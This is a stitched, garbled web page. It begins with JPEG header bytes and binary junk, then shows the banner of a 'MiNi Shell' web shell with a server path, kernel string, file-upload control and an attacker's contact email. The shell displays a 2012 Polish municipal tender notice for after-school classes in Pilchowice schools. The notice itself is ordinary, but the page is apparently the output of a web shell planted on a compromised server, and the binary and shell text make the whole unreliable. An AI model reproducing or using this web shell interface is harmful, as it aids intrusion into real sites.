JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120917/351290-N-2012.html

<p class="kh_header"><b>Pilchowice: Prowadzenie zajęć w ramach projektu: Indywidualne potrzeby uczniów Gminy Pilchowice</b><br>
<b>Numer ogłoszenia: 351290 - 2012; data zamieszczenia: 17.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pilchowice , ul. Damrota 6, 44-145 Pilchowice, woj. śląskie, tel. 032 2356521, faks 032 2356938.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie zajęć w ramach projektu: Indywidualne potrzeby uczniów Gminy Pilchowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest:
Przedmiotem zamówienia jest prowadzenie zajęć realizowanych w ramach projektu Indywidualne potrzeby uczniów Gminy Pilchowice  dla uczniów uczęszczających do szkół na terenie Gminy Pilchowice. Projekt realizowany jest ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki. Głównym celem projektu jest wyrównywanie szans edukacyjnych poprzez indywidualizację procesu kształcenia dzieci w klasach I - III w szkołach podstawowych funkcjonujących w Gminie Pilchowice. Projekt jest ukierunkowany na poprawę umiejętności matematyczno - przyrodniczych lub umiejętności plastyczno - technicznych 
u uczniów i uczennic, zmniejszenie ilości uczniów i uczennic posiadających trudności w czytaniu i pisaniu, w tym trudności dyslektyczne, zmniejszenie ilości uczniów i uczennic posiadających zaburzenia mowy, zmniejszenie ilości uczniów i uczennic posiadających wady postawy, zmniejszenie ilości uczniów i uczennic posiadających trudności w uczeniu się matematyki. 
Prowadzący zajęcia będzie odpowiadał za:
1)Przygotowanie oraz realizację zajęć dodatkowych dla uczniów
2)Dokumentację zajęć dodatkowych oraz kółek zainteresowań (karta czasu pracy, dzienniki zajęć, listy obecności)
3)Prowadzenie zajęć zgodnie z przygotowanym wcześniej programem, planem zajęć oraz harmonogramem (zajęcia mają odbyć się w ciągu 30 tygodni)
4)Prowadzenie zajęć w godzinach od 12.00 do 16.15 w każdej placówce
Za kontrolę zadań powierzonych nauczycielom będzie odpowiadał Koordynator zadania w ramach poszczególnych szkół oraz Koordynator Projektu.

Miejsce wykonywania usługi:
Zespół Szkół w Pilchowicach (Szkoła Podstawowa) ul. Świerczewskiego 1, 44-145 Pilchowice 
Zespół Szkolno - Przedszkolny w Stanicy (Szkoła Podstawowa) ul. Gliwicka 18, 44-145 Stanica
Zespół Szkolno - Przedszkolny w Żernicy (Szkoła Podstawowa) ul. L. Miki 37, 44-144 Żernica
Zespół Szkolno - Przedszkolny w Wilczy (Szkoła Podstawowa) ul. K. Miarki 27, 44-189 Wilcza

Rodzaj zajęć pozalekcyjnych:

1)Zajęcia dla dzieci ze spec. trudnościami w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji
12 godzin  x 30 tygodni = 360 godzin
SP Stanica - 2 godziny
SP Wilcza - 2 godziny
SP Pilchowice - 5 godzin
SP Żernica - 3 godziny

2)Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych 
8 godzin x 30 tygodni = 240 godzin
SP Stanica - 1 godzina
SP Wilcza - 1 godzina
SP Pilchowice - 3 godziny
SP Żernica - 3 godziny

3)Zajęcia logopedyczne dla dzieci z zaburzeniami mowy
7 godzin x 30 tygodni = 210 godzin
SP Stanica - 1 godzina
SP Wilcza - 2 godziny
SP Pilchowice - 1 godzina
SP Żernica - 3 godziny

4)Gimnastyka korekcyjna dla dzieci z wadami postawy
10 godzin x 30 tygodni = 300 godzin
SP Stanica - 2 godziny
SP Wilcza - 2 godziny
SP Pilchowice - 3 godziny
SP Żernica - 3 godziny

5)Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych w zakresie nauk przyrodniczo - matematycznych
6 godzin x 30 tygodni = 180 godzin
SP Stanica - 1 godzina
SP Wilcza - 1 godzina
SP Pilchowice - 2 godziny
SP Żernica - 2 godziny

6)Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - kółko plastyczno - techniczne
12 godzin x 30 tygodni = 360 godzin
SP Stanica - 2 godziny
SP Wilcza - 3 godziny
SP Pilchowice - 3 godziny
SP Żernica - 4 godziny

7)Specjalistyczne zajęcia terapeutyczne - arteterapia
1 godzina x 30 tygodni = 30 godzin 
SP Stanica - 1 godzina

8)Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - kółko informatyczne
2 godziny x 30 tygodni = 60 godzin
SP Stanica - 1 godzina
SP Wilcza - 1 godzina

9)Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - kółko literacko - filmowe 
1 godzina x 30 tygodni = 30 godzin
SP Stanica - 1 godzina

10)Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - kółko teatralne
1 godzina x 30 tygodni = 30 godzin
SP Wilcza - 1 godzina

Postępowanie podzielono na 4 zadania:
Zadanie 1
Nazwa: Zespół Szkół w Pilchowicach 
Zakres zadania:
- prowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym zagrożonych 
  ryzykiem dysleksji (5 grup)
- prowadzenie zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych (3 grupy)
- prowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy (1 grupa)
- prowadzenie zajęć z gimnastyki korekcyjnej dla dzieci z wadami postawy (3 grupy)
- prowadzenie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych w zakresie nauk 
  przyrodniczo - matematycznych (2 grupy)
- prowadzenie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych - kółko 
  plastyczno - techniczne (3 grupy)
         Czas trwania zajęć: październik 2012r. - czerwiec 2013r.
        

Zadanie 2
Nazwa: Zespół Szkolno - Przedszkolny w Stanicy 
Zakres zadania:
- prowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym zagrożonych 
  ryzykiem dysleksji (2 grupy)
- prowadzenie zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych (1 grupa)
- prowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy (1 grupa)
- prowadzenie zajęć z gimnastyki korekcyjnej dla dzieci z wadami postawy (2 grupy)
- prowadzenie specjalistycznych zajęć terapeutycznych - arteterapia (1 grupa)
- prowadzenie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych w zakresie nauk 
  przyrodniczo - matematycznych (1 grupa)
- prowadzenie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych - kółko   
  Informatyczne (1 grupa)
- prowadzenie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych - kółko literacko   
  - filmowe (1 grupa)
- prowadzenie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych - kółko 
  plastyczno - techniczne (2 grupy) 
      Czas trwania zajęć: październik 2012r. - czerwiec 2013r.

Zadanie 3
Nazwa: Zespół Szkolno - Przedszkolny w Wilczy
Zakres zadania:
- prowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym zagrożonych 
  ryzykiem dysleksji (2 grupy)
- prowadzenie zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych (1 grupa)
- prowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy (2 grupy)
- prowadzenie zajęć z gimnastyki korekcyjnej dla dzieci z wadami postawy (2 grupy)
- prowadzenie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych w zakresie nauk 
  przyrodniczo - matematycznych (1 grupa)
- prowadzenie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych - kółko   
  Informatyczne (1 grupa)
- prowadzenie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych - kółko teatralne    
  (1 grupa) 
- prowadzenie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych - kółko 
  plastyczno - techniczne (3 grupy) 
     Czas trwania zajęć: październik 2012r. - czerwiec 2013r.

Zadanie 4
Nazwa: Zespół Szkolno - Przedszkolny w Żernicy
Zakres zadania:
- prowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym zagrożonych 
  ryzykiem dysleksji (3 grupy)
- prowadzenie zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych (3 grupy)
- prowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy (3 grupy)
- prowadzenie zajęć z gimnastyki korekcyjnej dla dzieci z wadami postawy (3 grupy)
- prowadzenie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych w zakresie nauk 
  przyrodniczo - matematycznych (2 grupy)
- prowadzenie zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych - kółko 
  plastyczno - techniczne (4 grupy)
         Czas trwania zajęć: październik 2011r. - czerwiec 2012r.   

Informacje o projekcie 

W celu przybliżenia przedmiotu projektu poniżej zamieszcza się opis projektu, jego cele, działania, rezultaty. 

UZASADNIENIE

Gmina Pilchowice rozpoczęła 1 września 2012r. realizację projektu pn. Indywidualne potrzeby uczniów Gminy Pilchowice w ramach Priorytetu IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałania 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych Program Operacyjny Kapitał Ludzki.

Cele projektu:
Celem ogólnym projektu jest wyrównywanie szans edukacyjnych poprzez indywidualizację procesu kształcenia dzieci w klasach I - III w szkołach podstawowych funkcjonujących w Gminie Pilchowice.

Cele szczegółowe projektu:
Poprawa umiejętności matematyczno - przyrodniczych lub umiejętności plastyczno - technicznych u uczniów i uczennic,
Zmniejszenie ilości uczniów i uczennic posiadających trudności w czytaniu i pisaniu, w tym trudności dyslektyczne,
Zmniejszenie ilości uczniów i uczennic posiadających zaburzenia mowy,
Zmniejszenie ilości uczniów i uczennic posiadających wady postawy,
Zmniejszenie ilości uczniów i uczennic posiadających trudności w uczeniu się matematyki. 

Informacje ogólne: 
Projektodawca i realizator projektu: Gmina Pilchowice,
Zarządzanie projektem: Zespół projektowy,
Instytucje/osoby będące bezpośrednimi odbiorcami: uczniowie i uczennice klas I - III szkół podstawowych prowadzonych przez Gminę Pilchowice..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, którzy mogą wykazać się co najmniej trzyletnim stażem pracy pedagogicznej oraz prowadzeniem zajęć w ramach projektu finansowanego z Programu Operacyjnego Kapitał Ludzki.
W przypadku podmiotów działających wspólnie osoby zdolne do wykonania zamówienia podlegają sumowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, którzy dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia. Muszą posiadać wykształcenie wyższe kierunkowe zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009r. W sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (DZ. U. z 2009r. Nr 50, poz. 400 oraz z 2012r. poz. 174) oraz wykazać się co najmniej trzyletnim stażem pracy i co najmniej jednorazowym udziałem w prowadzeniu zajęć w ramach Programu Operacyjnego Kapitał Ludzki.
W przypadku podmiotów działających wspólnie osoby zdolne do wykonania zamówienia podlegają sumowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany postanowień niniejszej umowy mogą nastąpić za zgodą stron wyrażoną na piśmie pod rygorem nieważności w następujących przypadkach:
-zmianie podwykonawców realizujących zamówienie, 
-zmianie terminów realizacji zamówienia z powodów przerwy w funkcjonowaniu szkoły uniemożliwiającej realizację zamówienia, niezależnej od wykonawcy
-zaistnienia nowych okoliczności, niezależnych od Zamawiającego i Wykonawcy, uzasadniających zmiany terminów, oraz adresu wykonywania usługi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pilchowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Pilchowice
ul. Damrota 6
44-145 Pilchowice
pok. nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.09.2012 godzina 08:00, miejsce: Urząd Gminy Pilchowice
ul. Damrota 6
44-145 Pilchowice
pok. nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet IX Rozwój wykształcenia i kompetencji w regionach  Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych. 100% środków finansowych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com